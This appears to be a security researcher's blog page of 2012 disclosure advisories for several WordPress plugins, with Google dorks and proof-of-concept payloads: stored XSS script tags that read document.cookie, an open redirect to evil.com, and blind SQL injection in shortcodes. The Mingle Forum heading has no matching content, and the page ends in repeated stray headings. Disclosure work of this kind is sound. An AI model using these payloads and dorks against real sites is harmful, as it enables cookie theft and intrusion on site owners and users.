Cloudberry Engineering

2012-01-21 WordPress Mingle Forum <= 1.0.32.1 Multiple Vulnerabilities

2012-01-21

# Exploit Title: WordPress Shortcode Redirect plugin <= 1.0.01 Stored XSS
# Dork: inurl:/wp-content/plugins/shortcode-redirect/
# Date: 2012/01/18 
# Author: Gianluca Brindisi (g@brindi.si @gbrindisi http://brindi.si/g/)
# Software Link: http://downloads.wordpress.org/plugin/shortcode-redirect.1.0.01.zip
# Version: 1.0.01

Vulnerability

You need permissions to write a post (HTML mode) to exploit the shortcode:

[redirect url='http://wherever.com"[XSS]' sec='500"[XSS]']

# / #wordpress #advisory #stored-xss

2012-01-19
```
# Exploit Title: WordPress uCan Post plugin <= 1.0.09 Stored XSS
# Dork: inurl:/wp-content/plugins/ucan-post/
# Date: 2012/01/18
# Author: Gianluca Brindisi (g@brindi.si @gbrindisi http://brindi.si/g/)
# Software Link: http://downloads.wordpress.org/plugin/ucan-post.1.0.09.zip
# Version: 1.0.09
```
Vulnerability

You need permissions to publish a post from the public interface: The submission form is not well sanitized and will result in stored xss in admin pages:
- Name field is not sanitized and it’s injectable with a payload which will be stored in the pending submission page in admin panel POC: myname’"><script>window.alert(document.cookie)</script>
- Email field is not sanitized but can it will check for a valid email address so the maximum result will be a reflected xss POC: my@mail.com’"><script>window.alert(document.cookie)</script>
- Post Title is not sanitized and it’s injectable with a payload which will be stored in the pending submissions page in admin panel POC: title’"><script>window.alert(document.cookie)</script>
# / #wordpress #advisory #stored-xss
2012-01-10
```
# Exploit Title: WordPress Age Verification plugin <= 0.4 Open Redirect
# Date: 2012/01/10
# Dork: inurl:wp-content/plugins/age-verification/age-verification.php
# Author: Gianluca Brindisi (g@brindi.si @gbrindisi http://brindi.si/g/)
# Software Link: http://downloads.wordpress.org/plugin/age-verification.zip
# Version: 0.4
```
1. Via GET: http://server/wp-content/plugins/age-verification/age-verification.php?redirect_to=http%3A%2F%2Fwww.evil.com The rendered page will provide a link to http://www.evil.com
2. Via POST: http://server/wp-content/plugins/age-verification/age-verification.php redirect_to: http://www.evil.com age_day: 1 age_month: 1 age_year: 1970 Direct redirect to http://www.evil.com
# / #wordpress #advisory #open-redirect
2012-01-06
```
# Exploit Title: WordPress Pay With Tweet plugin <= 1.1 Multiple Vulnerabilities
# Date: 01/06/2012
# Author: Gianluca Brindisi (g@brindi.si @gbrindisi http://brindi.si/g/)
# Software Link: http://downloads.wordpress.org/plugin/pay-with-tweet.1.1.zip
# Version: 1.1
```
1) Blind SQL Injection in shortcode:

Short code parameter ‘id’ is prone to blind sqli, you need to be able to write a post/page to exploit this:
```
[paywithtweet id="1' AND 1=2"]
[paywithtweet id="1' AND 1=1"]
```
2) Multiple XSS in pay.php

http://target.com/wp-content/plugins/pay-with-tweet.php/pay.php

After connecting to twitter:
```
?link=&22></input>[XSS]
```
After submitting the tweet:
```
?title=[XSS]&dl=[REDIRECT-TO-URL]')")[XSS]
```
The final download link will be replaced with [REDIRECT-TO-URL]

POC: pay.php?link=%22></input><script>alert(document.cookie)</script>&title=<script>alert(document.cookie)</script>&dl=http://brindi.si%27"<script>alert(document.cookie)</script>
# / #wordpress #advisory #sql-injection #xss

Vulnerability

Vulnerability

1) Blind SQL Injection in shortcode:

2) Multiple XSS in pay.php